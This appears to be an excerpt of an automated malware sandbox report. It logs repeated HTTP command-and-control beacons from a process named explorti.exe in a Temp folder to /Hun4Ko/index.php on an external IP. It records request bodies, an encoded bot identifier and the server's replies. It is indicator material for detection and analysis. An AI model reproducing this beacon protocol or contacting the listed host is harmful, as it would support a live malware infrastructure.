                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      17192.168.2.44975477.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:22.189647913 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:22.891537905 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:22 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:22.892379045 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:23.115746975 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:23 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      18192.168.2.44975577.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:23.240952969 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:23.954905987 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:23 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:23.955631971 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:24.197046041 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:24 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      19192.168.2.44975677.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:24.318589926 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:25.042634010 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:24 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:25.043482065 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:25.262051105 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:25 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      20192.168.2.44975777.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:25.381141901 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:26.088069916 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:25 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:26.088958979 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:26.309264898 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:26 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      21192.168.2.44975877.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:26.428246975 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:27.119123936 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:27 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:27.119851112 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:27.336050034 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:27 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      22192.168.2.44975977.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:27.444746017 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:28.142973900 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:28 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:28.144495964 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:28.396919012 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:28 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      23192.168.2.44976077.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:28.505748987 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:29.231925964 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:29 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:29.232848883 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:29.457209110 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:29 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      24192.168.2.44976177.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:29.601763964 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:30.306266069 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:30 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:30.307140112 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:30.530957937 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:30 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      25192.168.2.44976277.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:30.646775007 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:31.345115900 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:31 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:31.346044064 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:31.570571899 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:31 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      26192.168.2.44976377.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:31.677988052 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:32.418133974 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:32 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:32.419085979 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:32.645020962 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:32 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      27192.168.2.44976477.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:32.756105900 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:33.503607035 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:33 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:33.511679888 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:33.735248089 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:33 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      28192.168.2.44976577.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:33.857276917 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:34.557576895 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:34 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:34.558537006 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:34.780452967 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:34 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      29192.168.2.44976677.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:34.909210920 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:35.608382940 CEST219INHTTP/1.1 200 OK
